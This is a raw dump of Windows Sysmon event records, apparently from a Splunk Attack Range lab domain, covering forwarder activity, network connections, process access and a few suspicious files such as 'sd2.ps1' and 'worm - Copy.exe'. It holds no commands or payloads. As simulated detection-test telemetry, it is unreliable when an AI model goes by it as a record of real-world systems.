Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB8979FE76094DC2B5CBE0BBFC8E58E,SHA256=0817F14B4303977FA26584185BA10400DD292D256C9194B11AF446ABCBED83E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:12.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7629DBD5AA6CFD0271776239E0CDC6CB,SHA256=8141E0E3E23F8F30664471CE764695ADB6BC08C913DF1DB69568A1F604060D52,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:12.442{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001055494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:12.442{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=1B5BABF70F1434DFBB9E2810AEF1CB90,SHA256=AF5915D73F1B4569F4D4F99977614ADBCDD080627FAA3351187E44B18A34BA01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:13.923{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28BFD7D1277ED09519099DF642E66F50,SHA256=0A59192FEDFEA9CD14DE96C7B7733FA5880DE981CDFB93F2B1A89F9ED13912F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:13.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A5ACA77D9FFA3C0BD51E1FC0A8F4CF3,SHA256=A04197AB6A89B73DD6FDD06C3AD090A6C910660B23248F37D09998CC5A842A26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:13.341{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\sd2.ps1@2021-07-12_081008MD5=825635D781CDB283AA60604F0A86A18E,SHA256=06D071FD5C75DFDA52208A962D2D1256A20C48431C9F4BFC0EA2E971C61BA10C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:13.341{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps12021-07-12 07:48:31.886 23542300x80000000000000001055497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:13.341{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps1MD5=62B41225D59C431B6C7299EDBAE98630,SHA256=5E62CDC587612962F3176F64AD3700B0C6E083386C2E0968FCE255907E042A9B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001055501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:14.941{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BCD76A38FF056796169E49472EACC54,SHA256=CD230D39BFFA49C1F4E504B83B992DD5FFA87437A0492A1B6028C56A13877409,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:14.267{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E41425B6CE3280FC906F9FED56014F,SHA256=7E39B1A2B11D71B4B46BFBBFD1E14A86909FFB214194328C9ADFFEF4625199F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:12.291{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57494-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:15.956{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F246C3A57D2CDD2CCDCB808002697F48,SHA256=95AC4784CC94B79BA3E67C5BA5147DC0D46CCAB24D6744040A3EB99B523E1F10,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:15.295{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37FA3A9AABEF4CDF621551464A22B5C6,SHA256=6A2BFA9E62FB25C6F562B0941BB5B40F0B10A38E3FCB1486F0C8141678190D8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:15.641{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8A00A1462AA97FEA08A3EB09B7EC85C,SHA256=B261C5564D011786C0CFAA16353FC501C32C087218DD0C1380B3E957328F7612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:15.641{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B446BE4283E65BECFEA297785043789D,SHA256=F3B18154A174BB2AF498BB0D2E7EEB9DE21B52FC4B4F06D0082C6C6EA2946550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:16.971{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BDBFC50DA00508FD2F9D72BD78E11CC,SHA256=97C24E4C2D7DB2CEFE83B01A62F74E06FDBBC35FD1975B6E943EAF64759CD93D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:16.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84B5440FECD002C7E2126CE6307B82C3,SHA256=5BAAF0E58B887C5932CC69749A83044BC85A05B077FAB01CFEC5AF98E2C5C88A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:08.144{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62007-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001055506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:08.144{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62007-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001055505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:07.713{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62006-false10.0.1.12-8000- 23542300x80000000000000001055510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:17.987{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9892E234B65E11518EB9902D1C9C2343,SHA256=24E888C0D46E7E1E2767A12777F4EC154F38435194FD5AC53BE5F7AC7D9904D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:17.326{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2F14A585AD58C78FCF97513578DD26E,SHA256=32C1E55871103A315DB624FF881B76227827220F4A64A6A4581D127E6D3A569F,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 08:10:17.971{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Temp\test\worm - Copy.exe2021-07-12 08:10:17.971 23542300x8000000000000000810791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:18.326{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF00AAEA702FDE8FF7D335D2017B1C6B,SHA256=57DCE7402D136A8458128871E2AE30D754D2CA070037AB96D6607D70BC0D2B17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:18.620{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:19.342{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF5E9D979791249330D90EDE7B2F6137,SHA256=F7454EA1FD4BD1EE2097A87088407CD2E190C418CE55B02F9213F75982B68F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:19.003{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E40CBA4D9F23B817BAD08908B4D3A99,SHA256=D2A5B706FD0F2CB91A18DA9E6F8F4960BF6FE17B2C7015448E043C59831B25B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:20.920{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:20.435{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CF3BA5032ED5FA998CD2082AFC9FB6B,SHA256=99982258B566D464D7F42514A4B9402A19089DFC11F6C9B2793DED00AA8A9682,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:20.021{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1515C2EB77F2597579807554B35BAD5,SHA256=DD95CAB48C0C66F457383383CC7D9063EEF93A49B3663694F202045B7DF36933,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:18.288{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57495-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:21.482{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DA6727C4BF8698443A34D3990519445,SHA256=035DB784F70CF8FBE2A46772D4742719E39865E7A9B975BA8B11A53FD0C93E00,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:13.578{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62008-false10.0.1.12-8000- 23542300x80000000000000001055514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:21.038{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81D2BCFDADE12C5539C9E80D8CECB731,SHA256=023FE9F40E6D2F1A73ADCC3E34312D1FDA0B5F9B0F9B261FA4291F7F2BE9B45B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:22.514{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86164600D55B235F6C694ED161847716,SHA256=6FCC3E1044D5014AB0F0C48354515A435179767BB7B79B367EA16119E126D95A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:22.054{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E011149FF4242150EF283D59A4DB3C9C,SHA256=64A6F6E50542BFAC13C71111EA1E5CD905A34A89726EB0EB0717081815084722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:23.826{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF384C1F253C934175EDE2457607C89E,SHA256=99FF886ACA90F77B3D48C00E1FA70724D91D8A14CC41EC11ABF716C8AA53ACD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:23.826{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1AAB564721D6EF7704F7D48944815EE,SHA256=023378C4B95A7858F932DFC20D45699167CF88526A5E8C26C02C3A19441CB360,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:23.530{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73200AC24DAAC8161706881B10DA8154,SHA256=DB3763FCB868DC189BED5BBEA84DAF887445D2D3E0B4491463995FEAC7FFBFD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:23.070{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65CC6E06D1E0487E225E1444EFCC5D5E,SHA256=824A47DBF28FB11F13694B1BD783EE1596690FD7A5A65136796A405330DD1610,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:21.053{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57496-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 10341000x8000000000000000810830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F0-60EB-F279-00000000D001}1656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
